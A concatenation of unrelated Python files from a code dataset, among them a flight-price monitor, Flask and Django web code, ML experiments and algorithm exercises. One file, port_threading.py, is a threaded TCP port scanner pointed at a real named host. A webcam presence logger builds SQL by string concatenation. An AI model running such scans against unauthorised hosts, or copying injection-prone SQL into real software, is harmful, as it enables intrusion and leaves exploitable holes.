print(x)\n","sub_path":"mypy-17.py","file_name":"mypy-17.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"438863703","text":"import arrow\nimport pprint\nfrom read_city_code import read_city_code\nfrom APIs import get_price_info_tuniu, get_price_info_qunar\nimport calendar\nimport sys\n\nprint('\\n\\tWelcome to Air-Fare-Monitor V1.0!')\nprint('\\tThe information is from http://www.tuniu.com and https://www.qunar.com.')\nprint('\\tWhen you decide to buy air ticket(s), I suggest you to')\nprint('\\t1. check details on the above websites.')\nprint('\\t2. go to the offical website of some airline and buy the ticket(s) with the origin price(s).')\nprint('\\t=========================================')\nprint('\\t欢迎来到机票监控器V1.0!')\nprint('\\t程序信息来源于 http://www.tuniu.com 和 https://www.qunar.com 。')\nprint('\\t当你决定购买机票时,我建议你:')\nprint('\\t1. 到上述数据源网站查看详细的机票信息。')\nprint('\\t2. 到航空公司官方网站购买原价机票。\\n')\nprint('All the options have default values. 
You can press to skip.')\ndef get_input(info, default, add=''):\n value = input(info)\n if value == '':\n value = default\n if type(value) != type('') or not value:\n return value\n return value + add\n\n\nstart_Fri = get_input('(Default is today) Monitor will start from(yyyy-mm-dd): ', arrow.utcnow().format('YYYY-MM-DD') + 'T00:00:00+00:00', 'T00:00:00+00:00')\narr_start_Fri = arrow.get(start_Fri)\nwhile arr_start_Fri.weekday() != calendar.FRIDAY:\n arr_start_Fri = arr_start_Fri.shift(days=+1)\n\n\nend_Fri = get_input('(Default is the last Friday in this year) Monitor will end until(yyyy-mm-dd): ', str(arrow.utcnow().year) + '-12-31T00:00:00+00:00','T00:00:00+00:00')\narr_end_Fri = arrow.get(end_Fri)\nwhile arr_end_Fri.weekday() != calendar.FRIDAY:\n arr_end_Fri = arr_end_Fri.shift(days=-1)\n\n\ncity2code = read_city_code()\norg = get_input('(Default is 昆明) Origin City: ', '昆明')\nif org not in city2code:\n print('Error: ' + org + 'not a valid city name.\\n Check http://www.carnoc.com/mhzl/jchzl/airport3code.htm.')\n sys.exit()\ndst = get_input('(Default is 上海) Destination City: ', '上海')\nif dst not in city2code:\n print('Error: ' + dst + 'not a valid city name.\\n Check http://www.carnoc.com/mhzl/jchzl/airport3code.htm.')\n sys.exit()\n\ntwo_way = get_input('(Default is N) Two way tickets (y/N): ', False)\nif two_way == 'N':\n two_way = False\nelif two_way is not False:\n two_way = True\nelse:\n pass\n\nif two_way:\n interval = int(get_input('(Default is 2) # of interval days: ', 2))\n\nthreshold = get_input('(Default is None) The highest price to inform: ', None)\n\nif threshold:\n print('\\nNote: Only test for 163/126 smtp email server.\\n')\n email_reminder = get_input('(Default is N) Receive a email reminder (y/N): ', False)\n if email_reminder == 'N':\n email_reminder = False\n elif email_reminder is not False:\n email_reminder = True\n else:\n pass\n\nprice_tuniu = get_price_info_tuniu(city2code[org], city2code[dst], arr_start_Fri.format('YYYY-MM-DD'), arr_end_Fri.format('YYYY-MM-DD'))\nprice_qunar = get_price_info_qunar(org, dst, arr_start_Fri, arr_end_Fri)\n\nif two_way:\n priceb_tuniu = get_price_info_tuniu(city2code[dst], city2code[org], arr_start_Fri.format('YYYY-MM-DD'), arr_end_Fri.format('YYYY-MM-DD'))\n priceb_qunar = get_price_info_qunar(dst, org, arr_start_Fri, arr_end_Fri)\n\n pricet_tuniu = dict.fromkeys([item for item in price_tuniu if arrow.get(item).shift(days=+interval).format('YYYY-MM-DD') in priceb_tuniu])\n pricet_qunar = dict.fromkeys([item for item in price_qunar if arrow.get(item).shift(days=+interval).format('YYYY-MM-DD') in priceb_qunar])\n\n for key in pricet_tuniu:\n pricet_tuniu[key] = price_tuniu[key] + priceb_tuniu[arrow.get(key).shift(days=+interval).format('YYYY-MM-DD')]\n\n for key in pricet_qunar:\n pricet_qunar[key] = price_qunar[key] + priceb_qunar[arrow.get(key).shift(days=+interval).format('YYYY-MM-DD')]\n\n #pprint.pprint(pricet_tuniu)\n #pprint.pprint(pricet_qunar)\n\nif not two_way:\n if not threshold:\n print('Tuniu (single):')\n pprint.pprint(price_tuniu)\n print('Qunar (single):')\n pprint.pprint(price_qunar)\n else:\n print('Tuniu (single):')\n text_tuniu = {k: v for k, v in price_tuniu.items() if v <= int(threshold)}\n pprint.pprint(text_tuniu)\n print('Qunar (single):')\n text_qunar = {k: v for k, v in price_qunar.items() if v <= int(threshold)}\n pprint.pprint(text_qunar)\n\n\nelse:\n ## 暂时仅支持往返模式, 7天一检测周期\n start_date = arr_start_Fri\n tuniu_Fri = {}\n qunar_Fri = {}\n while start_date < arr_end_Fri:\n start_date_str = 
start_date.format('YYYY-MM-DD')\n if start_date_str in pricet_tuniu:\n tuniu_Fri[start_date_str] = pricet_tuniu[start_date_str]\n if start_date_str in pricet_qunar:\n qunar_Fri[start_date_str] = pricet_qunar[start_date_str]\n \n start_date = start_date.shift(days=+7)\n\n if not threshold:\n print('Tuniu (two way):')\n pprint.pprint(tuniu_Fri)\n print('Qunar (two way):')\n pprint.pprint(qunar_Fri)\n else:\n print('Tuniu (two way):')\n text_tuniu = {k: v for k, v in tuniu_Fri.items() if v <= int(threshold)}\n pprint.pprint(text_tuniu)\n print('Qunar (two way):')\n text_qunar = {k: v for k, v in qunar_Fri.items() if v <= int(threshold)}\n pprint.pprint(text_qunar)\n\n\nif email_reminder:\n from reminder import Reminder, read_setting\n import json\n email_setting = read_setting()\n r = Reminder(org, dst, email_setting['mail_user'], json.dumps({'Tuniu': text_tuniu, 'Qunar': text_qunar}, indent=4))\n r.send_email()\n\n","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"609913281","text":"#2015/10/13\r\nimport socket\r\nimport threading #allows multiple processes to take place at a time\r\nfrom queue import Queue\r\nimport time\r\n\r\nprint_lock = threading.Lock() #reference locking ability of thread module\r\nserver = 'pythonprogramming.net'\r\n\r\ndef portscan(port): #port scanner\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #connection type: tcp connection\r\n try:\r\n con = s.connect((server,port))\r\n with print_lock:\r\n print('port ',port,' is open!')\r\n con.close()\r\n except:\r\n pass\r\n'''\r\n#The last job was:\r\ndef exJob(worker): #task\r\n time.sleep(0.5) #mimicks time to complete a job\r\n\r\n with print_lock: #can't access/modify simultaneously by two processes; unlocks when unless one process done\r\n print(threading.current_thread().name, worker) #releases lock once done printing threader name and worker\r\n'''\r\ndef threader():\r\n while True: #continue while main thread is True\r\n worker = q.get()\r\n portscan(worker) #function\r\n #exJob(worker) \r\n q.task_done() #complete and move on\r\nq = Queue()\r\n\r\nfor x in range(30): #30 threads to do some work\r\n t = threading.Thread(target = threader) #target is threader function\r\n t.daemon = True #dies when main thread dies\r\n t.start() #start threading\r\n\r\nstart = time.time()\r\n\r\n#assign the amount of jobs\r\nfor worker in range(1,23): #test first 24; try 100 ports!\r\n q.put(worker) #\r\nq.join() #wait until thread terminates; blocks the program from quitting until the queue becomes empty\r\n\r\nprint('Entire job took:', time.time()-start) #duration of process\r\n","sub_path":"port_threading.py","file_name":"port_threading.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"342497351","text":"from collections import defaultdict\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport optuna\n\nDIR = 'testing2.db'\n\n## load\nstudy = optuna.create_study(\n load_if_exists=True,\n study_name=DIR.split(\".\")[0],\n storage=f\"sqlite:///{DIR}\",\n direction='maximize'\n) # Create a new study.\ndf = study.trials_dataframe(attrs=('number', 'value', 'params', 'state'))\n\n## plot\nplt.scatter(2 ** df.params_batch_size, df.value)\nplt.title(\"batch_size\")\nplt.ylabel(\"accuracy\")\nplt.tight_layout()\nplt.xscale(\"log\")\nplt.ylim((0.6, 
1.05))\nplt.grid()\nplt.show()\n\nplt.scatter(2 ** df.params_hidden_dim, df.value)\nplt.title(\"hidden_dim\")\nplt.ylabel(\"accuracy\")\nplt.tight_layout()\nplt.xscale(\"log\")\nplt.ylim((0.6, 1.05))\nplt.grid()\nplt.show()\n\nplt.scatter(df.params_lr, df.value)\nplt.title(\"learning rate\")\nplt.ylabel(\"accuracy\")\nplt.tight_layout()\nplt.xscale(\"log\")\nplt.ylim((0.6, 1.05))\nplt.grid()\nplt.show()\n\nplt.scatter(df.params_weight_decay, df.value)\nplt.title(\"weight_decay\")\nplt.ylabel(\"accuracy\")\nplt.tight_layout()\nplt.xscale(\"log\")\nplt.ylim((0.6, 1.05))\nplt.grid()\nplt.show()\n\nplot_dict = defaultdict(list)\nfor activation in df.params_activation.unique():\n subset = df[df.params_activation == activation]\n mean = subset.value.mean()\n stdev = subset.value.std()\n conf = (2.576 * stdev) / np.sqrt(len(subset))\n plot_dict['mean'].append(mean)\n plot_dict['conf'].append(conf)\n plot_dict['name'].append(activation)\nx_pos = np.arange(len(plot_dict[\"name\"]))\nplt.bar(x_pos, plot_dict['mean'], yerr=plot_dict['conf'])\nplt.xticks(x_pos, plot_dict['name'])\nplt.title(\"activations\")\nplt.ylim((0.6, 1.05))\nplt.grid()\nplt.tight_layout()\nplt.show()\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"395746610","text":"#! usr/bin/env python3\n# Copyright (C) 2015 by luo xing\n# License: GPL\n\nimport numpy as np\nimport re\n\n\ndef check(lst, n):\n ans = 0\n for i in range(n):\n for j in range(i + 1, n):\n for k in range(j + 1, n):\n len = lst[i] + lst[j] + lst[k]\n maxC = max(lst[i], lst[j], lst[k])\n rest = len - maxC\n if maxC < rest:\n ans = max(ans, len)\n\n return ans\n\n\nL = []\n\n\ndef slove(x, n):\n minT = 0\n for i in range(n):\n minT = max(minT, min(x[i], L - x[i]))\n\n maxT = 0\n for i in range(n):\n maxT = max(maxT, max(x[i], L - x[i]))\n\n\nmemo = []\n\n\ndef fib(n):\n if n <= 1:\n return n\n if memo[n] != 0:\n return memo[n]\n memo[n] = fib(n - 1) + fib(n - 2)\n return memo[n]\n\n\ndef x():\n t = 1\n\n def __init__(self):\n self.t = 1\n\n def y(self):\n print(\"jky\")\n self.t = 0\n x()\n\n if t == 1:\n print('jl')\n y()\n t = 0\n\n\ndef test1():\n s = 'NP(PRP he) NP(JJS strongest)(NN rain) ADVP(RB ever) VP(VBN recorded) PP(IN in) NP(NNP India)'\n regex = r\"[A-Z]{2,4}((\\([A-Z]{2,4} [\\w]*\\)){1,2})\"\n for match in re.finditer(regex, s):\n print(match.group(1))\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n import string\n s = 'The quick brown fox jumped over the lazy dog.'\n print(string.capwords(s))\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"463411566","text":"from flask import Flask, request, redirect, url_for, make_response, abort\nfrom werkzeug import secure_filename\nfrom pymongo import Connection\nfrom bson.objectid import ObjectId\nfrom gridfs import GridFS\nfrom gridfs.errors import NoFile\nimport numpy as np\nimport cv2\nimport sys\nfrom sklearn.externals import joblib\n\nfrom helpers import clarity_rating\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg', 'gif'])\nDB = Connection().geoai\nFS = GridFS(DB)\n\napp = Flask(__name__)\n\ndef allowed_file(filename):\n\treturn '.' 
in filename and \\\n\t\t\tfilename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n\tif request.method == 'POST':\n\t\tfile = request.files['file']\n\t\tif file and allowed_file(file.filename):\n\t\t\tfilename = secure_filename(file.filename)\n\t\t\toid = FS.put(file, content_type=file.content_type, filename=filename)\n\t\t\treturn redirect(url_for('serve_gridfs_file', oid=str(oid)))\n\treturn '''\n\t<!DOCTYPE html>\n\t<html>\n\t<head>\n\t<title>Upload new file</title>\n\t</head>\n\t<body>\n\t<h1>Upload new file</h1>\n\t<form action=\"\" method=\"post\" enctype=\"multipart/form-data\">\n\t<input type=\"file\" name=\"file\" />\n\t<input type=\"submit\" value=\"Upload\" />\n\t</form>\n\t<a href=\"%s\">
\n\t\n\tAll files\n\t\n\t\n\t''' % url_for('list_gridfs_files')\n\n@app.route('/files')\ndef list_gridfs_files():\n\tclassifier = joblib.load(\"demo\")\n\tfiles = [FS.get_last_version(file) for file in FS.list()]\n\ti=0\n\tdata=[]\n\tidset=[]\n\tresult=[]\n\twhile i%s')\\\n % (update, p.tag, p.id, id, p.tag)\n else:\n s += ('%s')\\\n % (update, p.tag, p.id, updateline, id, p.tag)\n\n lst.append(s)\n\n num = 5\n if len(lst) < num:\n s = 'Possible matches: ' + ', '.join(lst[:-1]) + ' and ' + lst[-1] + '.'\n else:\n rand = ''.join(random.choice(string.ascii_lowercase) for _ in xrange(10))\n s = 'Possible matches: ' % rand + ', '.join(lst[:num-1])\\\n + ' and ' % rand\\\n + '%i more' % (len(lst) - num + 1)\\\n + '%s'\\\n % (rand, ', '.join(lst[:-1]) + ' and ' + lst[-1])\\\n + '.'\n\n Message.__init__(self, s, '\\'%s\\' not unique' % search, type)\n self.id = id\n\n\ndef generate_messages(obj):\n ret = []\n for m in obj.message_set.all():\n ret.append(Message(m.text, m.title, m.type))\n return ret\n\ndef base_ctx(section=None, subpage=None, request=None, context=None):\n curp = Period.objects.filter(computed=True).order_by('-start')[0]\n menu = [('Ranking', '/periods/%i' % curp.id),\\\n ('Teams', '/teams/'),\\\n ('Records', '/records/history'),\\\n ('Results', '/results/'),\\\n ('Reports', '/reports/'),\\\n ('Predict', '/predict/'),\\\n ('About', '/faq/'),\\\n ('Submit', '/add/')]\n\n base = {'curp': curp, 'menu': menu, 'debug': DEBUG, 'cur_path': request.get_full_path()}\n base.update(csrf(request))\n\n if request != None:\n base['adm'] = request.user.is_authenticated()\n base['user'] = request.user.username\n\n if section == 'Records':\n base['submenu'] = [('History', '/records/history/'),\n ('HoF', '/records/hof/'),\\\n ('All', '/records/race/?race=all'),\\\n ('Protoss', '/records/race/?race=P'),\\\n ('Terran', '/records/race/?race=T'),\\\n ('Zerg', '/records/race/?race=Z')]\n elif section == 'Results':\n base['submenu'] = [('By Date', '/results/'),\\\n ('By Event', '/results/events/'),\\\n ('Search', '/results/search/')]\n elif section == 'Submit' and base['adm']:\n base['submenu'] = [('Matches', '/add/'),\\\n ('Review', '/add/review/'),\\\n ('Events', '/add/events/'),\\\n ('Open events', '/add/open_events/'),\\\n ('Integrity', '/add/integrity/'),\\\n ('Misc', '/add/misc/')]\n elif section == 'Teams':\n base['submenu'] = [('Ranking', '/teams/'),\\\n ('Transfers', '/player_transfers/')]\n elif section == 'Ranking':\n base['submenu'] = [('Current', '/periods/%i' % curp.id),\\\n ('History', '/periods/'),\\\n ('Earnings', '/earnings/')]\n elif section == 'Predict':\n base['submenu'] = [('Predict', '/predict/'),\n #('Factoids', '/factoids/'),\n ('Compare', '/compare/')]\n elif section == 'About':\n base['submenu'] = [('FAQ', '/faq/'),\n ('Blog', '/blog/'),\n #('Staff', '/staff/'),\n ('Database', '/db/')]\n elif section == 'Reports':\n pass\n\n if section != None:\n base['curpage'] = section\n\n if subpage != None:\n base['cursubpage'] = subpage\n\n if context != None:\n if type(context) == Player:\n rating = Rating.objects.filter(player=context, decay=0).order_by('-period')\n earnings = Earnings.objects.filter(player=context)\n\n base_url = '/players/%i-%s/' % (context.id, urlfilter(context.tag))\n\n base['submenu'] += [None, ('%s:' % context.tag, base_url)]\n\n if rating.exists():\n base['submenu'].append(('Rating history', base_url + 'historical/'))\n\n base['submenu'].append(('Match history', base_url + 'results/'))\n \n if earnings.exists():\n base['submenu'].append(('Earnings', base_url + 
'earnings/'))\n\n if rating.exists():\n base['submenu'].append(('Adjustments', base_url + 'period/%i/' % rating[0].period.id))\n\n base['messages'] = []\n\n return base\n\ndef db(request):\n base = base_ctx('About', 'Database', request)\n\n ngames = Match.objects.all().aggregate(Sum('sca'))['sca__sum'] + Match.objects.all().aggregate(Sum('scb'))['scb__sum']\n nmatches = Match.objects.all().count()\n nuntreated = Match.objects.filter(treated=False).count()\n\n nwol = Match.objects.filter(game='WoL').count()\n nhots = Match.objects.filter(game='HotS').count()\n\n nwolgames = Match.objects.filter(game='WoL').aggregate(Sum('sca'))['sca__sum'] + Match.objects.filter(game='WoL').aggregate(Sum('scb'))['scb__sum']\n nhotsgames = Match.objects.filter(game='HotS').aggregate(Sum('sca'))['sca__sum'] + Match.objects.filter(game='HotS').aggregate(Sum('scb'))['scb__sum']\n\t\n nonline = Match.objects.filter(offline = False).count()\n noffline = Match.objects.filter(offline = True).count()\n\t\n nonlinegames = Match.objects.filter(offline = False).aggregate(Sum('sca'))['sca__sum'] + Match.objects.filter(offline= False).aggregate(Sum('scb'))['scb__sum']\n nofflinegames = Match.objects.filter(offline = True).aggregate(Sum('sca'))['sca__sum'] + Match.objects.filter(offline= True).aggregate(Sum('scb'))['scb__sum']\n\n npartial = Match.objects.exclude(eventobj__isnull=True, event='').count()\n nfull = Match.objects.filter(eventobj__isnull=False).count()\n nuncatalogued = Match.objects.filter(eventobj__isnull=True).count()\n\n nplayers = Player.objects.all().count()\n nkoreans = Player.objects.filter(country='KR').count()\n nteams = Group.objects.filter(is_team=True).count()\n nactive = Group.objects.filter(active=True, is_team=True).count()\n ninactive = Group.objects.filter(active=False, is_team=True).count()\n\n\n base.update({'ngames': ngames, 'nmatches': nmatches, 'nuntreated': nuntreated,\\\n 'nwol': nwol, 'nhots': nhots, 'nonline': nonline, 'noffline': noffline,\\\n 'npartial': npartial, 'nfull': nfull, 'nuncatalogued': nuncatalogued,\\\n 'nplayers': nplayers, 'nkoreans': nkoreans,\\\n 'nteams': nteams, 'nactive': nactive, 'ninactive': ninactive,\\\n\t\t 'nwolgames': nwolgames, 'nhotsgames': nhotsgames, 'nonlinegames': nonlinegames, 'nofflinegames':nofflinegames})\n\n submitters = []\n for u in User.objects.all():\n n = Match.objects.filter(submitter=u).count()\n if n > 0:\n submitters.append((u, n))\n submitters.sort(key=lambda t: t[1], reverse=True)\n base['submitters'] = submitters\n\n dumpfile = '/usr/local/www/media/al/aligulac.sql'\n base['dump'] = os.path.exists(dumpfile)\n if base['dump']:\n stat = os.stat(dumpfile)\n base['megabytes'] = float(stat.st_size)/1048576\n base['modified'] = datetime.fromtimestamp(stat.st_mtime)\n\n base['updated'] = datetime.fromtimestamp(os.stat(PATH_TO_DIR + 'update').st_mtime)\n\n return render_to_response('db.html', base)\n\ndef staff(request):\n base = base_ctx('About', 'Staff', request)\n\n return render_to_response('staff.html', base)\n\ndef home(request):\n base = base_ctx(request=request)\n\n period = Period.objects.filter(computed=True).order_by('-start')[0]\n entries = ratings.tools.filter_active_ratings(Rating.objects.filter(period=period).order_by('-rating'))\n entries = entries.select_related('team', 'teammembership')[0:10]\n for entry in entries:\n teams = entry.player.groupmembership_set.filter(current=True, group__is_team=True)\n if teams.exists():\n entry.team = teams[0].group.shortname\n entry.teamfull = teams[0].group.name\n entry.teamid = 
teams[0].group.id\n\n blogs = Post.objects.order_by('-date')[0:3]\n\n base.update({'entries': entries, 'blogposts': blogs})\n \n return render_to_response('index.html', base)\n\ndef search(request, q=''):\n base = base_ctx(request=request)\n\n if q == '':\n q = request.GET['q']\n\n terms = shlex.split(q.encode())\n\n players = ratings.tools.find_player(terms, make=False, soft=True)\n\n teams = Group.objects.all()\n for qpart in terms:\n if qpart.strip() == '':\n continue\n query = Q(name__icontains=qpart) | Q(alias__name__icontains=qpart)\n teams = teams.filter(query)\n teams = teams.distinct()\n\n events = Event.objects.filter(type__in=['category','event'])\n for qpart in terms:\n if qpart.strip() == '':\n continue\n events = events.filter(Q(fullname__icontains=qpart))\n events = events.order_by('lft')\n\n if players.count() == 1 and teams.count() == 0 and events.count() == 0:\n return redirect('/players/%i-%s/' % (players[0].id, urlfilter(players[0].tag)))\n elif players.count() == 0 and teams.count() == 1 and events.count() == 0:\n return redirect('/teams/%i-%s/' % (teams[0].id, urlfilter(teams[0].name)))\n elif players.count() == 0 and teams.count() == 0 and events.count() == 1:\n return redirect('/results/events/%i-%s/' % (events[0].id, urlfilter(events[0].fullname)))\n\n base.update({'players': players, 'query': q, 'teams': teams, 'events': events})\n\n return render_to_response('search.html', base)\n\ndef logoutv(request):\n logout(request)\n return redirect('/add/')\n\ndef loginv(request):\n base = base_ctx(request=request)\n base.update(csrf(request))\n return render_to_response('login.html', base)\n\ndef changepwd(request):\n base = base_ctx(request=request)\n\n if not request.user.is_authenticated():\n base.update(csrf(request))\n return render_to_response('login.html', base)\n\n base.update({'user': request.user.username})\n\n if not ('old' in request.POST and 'new' in request.POST and 'newre' in request.POST):\n base.update(csrf(request))\n return render_to_response('changepwd.html', base)\n\n if not request.user.check_password(request.POST['old']):\n base['messages'].append(Message('The old password didn\\'t match. Your password was not changed.',\n type=Message.ERROR))\n base.update(csrf(request))\n return render_to_response('changepwd.html', base)\n \n if request.POST['new'] != request.POST['newre']:\n base['messages'].append(Message('The new passwords didn\\'t match. 
Your password was not changed.',\n type=Message.ERROR))\n base.update(csrf(request))\n return render_to_response('changepwd.html', base)\n\n request.user.set_password(request.POST['new'])\n base['messages'].append(Message(\n 'The password for ' + request.user.username + ' was successfully changed.', type=Message.SUCCESS))\n request.user.save()\n\n return render_to_response('changepwd.html', base)\n\ndef h404(request):\n base = base_ctx(request=request)\n\n return HttpResponseNotFound(render_to_string('404.html', base))\n\ndef h500(request):\n base = base_ctx(request=request)\n\n return HttpResponseNotFound(render_to_string('500.html', base))\n","sub_path":"aligulac/aligulac/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"448878996","text":"import psycopg2\nclass Customer:\n def __init__(self, ConnectionData):\n self.ConnectionData = ConnectionData\n def insert(self, customer):\n con = None\n try:\n con = psycopg2.connect(user=self.ConnectionData['user'],\n password=self.ConnectionData['password'],\n host=self.ConnectionData['host'],\n port=self.ConnectionData['port'],\n database=self.ConnectionData['database'])\n cur = con.cursor()\n sql = \"INSERT INTO TblCustomers(CustomerName, ContactName, Address, City, PostalCode, Country) VALUES (%s, %s, %s, %s, %s, %s)\"\n record_to_insert = (customer.CustomerName, customer.ContactName, customer.Address, customer.City, customer.PostalCode, customer.Country)\n cur.execute(sql, record_to_insert)\n con.commit()\n con.close()\n return 'Insert TblCustomers successfully'\n except (Exception, psycopg2.DatabaseError) as error:\n return str(error)\n finally:\n if con is not None:\n con.close()\n\nif __name__ == \"__main__\":\n print('this is data object package')","sub_path":"backend/DataObjects.py","file_name":"DataObjects.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"606850291","text":"class Solution:\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n \"\"\"\n if not prices:\n return 0\n mini, profit = prices[0], 0\n for i in prices:\n if i>mini:\n profit = max (profit, i-mini)\n else:\n mini=i\n return profit\n\"\"\"\nAll the straight forward solution should work, but if the interviewer twists the question slightly \nby giving the difference array of prices, Ex: for {1, 7, 4, 11}, if he gives {0, 6, -3, 7}, you might end up being confused.\n\ninformal proof on why this problem can be reduced to a contiguous subarray of differences question.\nSuppose we have prices: [1, 7, 4, 11] In other words, [a, b, c, d]\nThe maximum here is 11 - 1, in other words d - a.\nThe maximum subarray would be: (b-a) + (c-b) + (d-c) = -a + b - b + c - c + d = d - a\nHence, the problem is a bijection to the subarray question.\n\nHere, the logic is to calculate the difference (maxCur += prices[i] - prices[i-1]) of the original \narray, and find a contiguous subarray giving maximum profit. 
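For the [1, 7, 4, 11] example above, the differences are [6, -3, 7] and the best running sum is 6 - 3 + 7 = 10 = 11 - 1. 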
If the difference falls below 0, reset it to zero.\n\n public int maxProfit(int[] prices) {\n int maxCur = 0, maxSoFar = 0;\n for(int i = 1; i < prices.length; i++) {\n maxCur = Math.max(0, maxCur += prices[i] - prices[i-1]);\n maxSoFar = Math.max(maxCur, maxSoFar);\n }\n return maxSoFar;\n }\n*maxCur = current maximum value\n\n*maxSoFar = maximum value found so far\n\"\"\"","sub_path":"python/maxProfit.py","file_name":"maxProfit.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467968831","text":"\n'''\n\nImplement an algorithm that determines if a string has all unique characters.\nWhat if you cannot use additional data structures\n\n\nSolution One:\nTime complexity: O(N^2)\niterate over the string and compare each iteration to every other character after its position\n\nSolution Two:\nTime complexity: O(N*log(N))\nsort the string using a sorting algorithm that has a O(N*log(N)) time complexity,\nthen iterate over the sorted string and compare each value to its neighbor\n\n\n#I will be demonstrating solution one\n'''\n\ndef unique_b(string):\n for i, char in enumerate(string):\n for j in range(i+1, len(string)):\n if char == string[j]:\n return False\n return True\n\n","sub_path":"Chapter1/1.1b.py","file_name":"1.1b.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"434715008","text":"# _*_ coding:utf-8 _*_\nimport pandas as pd\nimport numpy as np\n\n# 获取数据集(20190301.csv)\nfrom algo.Adaboost import AdaClassify, AdaboostTrainDS\nfrom draw import plotROC\nfrom util.dataprocess import split_train_test\n\ndata = pd.read_csv('../data/day_stock_process/20190301.csv', index_col=0)[['open', 'high', 'low', 'close',\n 'pre_close', 'change', 'pct_chg', 'vol',\n 'amount',\n 'label']]\n# 打乱数据集\ndata_index = np.arange(data.shape[0])\nnp.random.shuffle(data_index)\ndata = data.iloc[data_index]\n\n# 划分数据集\ntrain_X, train_Y, test_X, test_Y = split_train_test(data)\n\n# 练得到弱分类器信息\nweakClass, aggClass = AdaboostTrainDS(train_X, train_Y, 7)\nprint(weakClass)\n# plotROC(aggClass.T,train_Y)\n\n# 使用弱分类器对特征矩阵进行分类\npredictions, aggClass0 = AdaClassify(train_X, weakClass)\n\n\n# 计算训练集分类准确率\nm = train_X.shape[0]\ntrain_re = 0 # 训练集分正确的样本个数\nfor i in range(m):\n if predictions[i] == train_Y[i]:\n train_re += 1\ntrain_acc = train_re / m\ntrain_acc = round(train_acc*100,2)\nprint(f'训练集准确率为{train_acc}')\n\n# 计算测试集分类准确率\ntest_re = 0\nTP = 0\nFP = 0\nFN = 0\nTN = 0\nn = test_X.shape[0]\npredictions, aggClass1 = AdaClassify(test_X, weakClass)\n\nfor i in range(n):\n if predictions[i]==1 and test_Y[i]==1:\n TP += 1\n if predictions[i] == 1 and test_Y[i] == -1:\n FP += 1\n if predictions[i]==-1 and test_Y[i]==1:\n FN += 1\n if predictions[i]==-1 and test_Y[i]==-1:\n TN += 1\n if predictions[i] == test_Y[i]:\n test_re += 1\ntest_acc = test_re / n\ntest_acc = round(test_acc*100,2)\nprint(f'测试集准确率为{test_acc}')\nprint(f'TP:{TP}')\nprint(f'FP:{FP}')\nprint(f'FN:{FN}')\nprint(f'TN:{TN}')","sub_path":"test/adaboost_prediction_v2.py","file_name":"adaboost_prediction_v2.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"511615165","text":"from datetime import datetime\nimport cv2\nimport sqlite3\n\n\n\ndef insertPresent(dt):\n conn = sqlite3.connect(\"facebase.db\")\n cmd = \"insert into WORKHOUR (User_Present) values('\"+ dt + \"')\"\n 
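# note: the SQL string above is built by concatenation; a parameterized query such as conn.execute(\"insert into WORKHOUR (User_Present) values (?)\", (dt,)) would be safer\n    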
conn.execute(cmd)\n    conn.commit()\n    conn.close()\n\n\ndef insertMovedAway(dt):\n    conn = sqlite3.connect(\"facebase.db\")\n    cmd = \"insert into WORKHOUR (User_Moved_Away) values('\" + dt + \"')\"\n    conn.execute(cmd)\n    conn.commit()\n    conn.close()\n\n\ndef surveillance():\n    statusList = [None, None]\n    cam = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n    firstFrame = None  # reference background frame, set on the first successful read\n    while True:\n        ret, frame = cam.read()\n        status = 0\n        if ret:\n            gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n            gray = cv2.GaussianBlur(gray, (21, 21), 0)\n            if firstFrame is None:\n                firstFrame = gray\n                continue\n\n            deltaFrame = cv2.absdiff(firstFrame, gray)\n            threshDelta = cv2.threshold(deltaFrame, 30, 255, cv2.THRESH_BINARY)[1]\n            threshDelta = cv2.dilate(threshDelta, None, iterations=0)\n            (cnts, _) = cv2.findContours(threshDelta.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n            for contour in cnts:\n                if 8000 < cv2.contourArea(contour) < 15000:\n                    status=1\n                    (x,y,w,h) = cv2.boundingRect(contour)\n                    cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)\n            statusList.append(status)\n\n            statusList1 = statusList[-2:]\n\n            if statusList1[-1] == 1 and statusList1[-2] == 0:\n                up=str(datetime.now())\n                #print('user is there at:' + up)\n                insertPresent(up)\n            if statusList1[-1] == 0 and statusList1[-2] == 1:\n                ua=str(datetime.now())\n                #print('user moved away at:' + ua)\n                insertMovedAway(ua)\n\n\n            cv2.imshow('frame', frame)\n            cv2.waitKey(500)\n            if cv2.waitKey(500) == ord('q'):\n                break\n        else:\n            print('preparing camera:')\n            pass\n\n    cam.release()\n    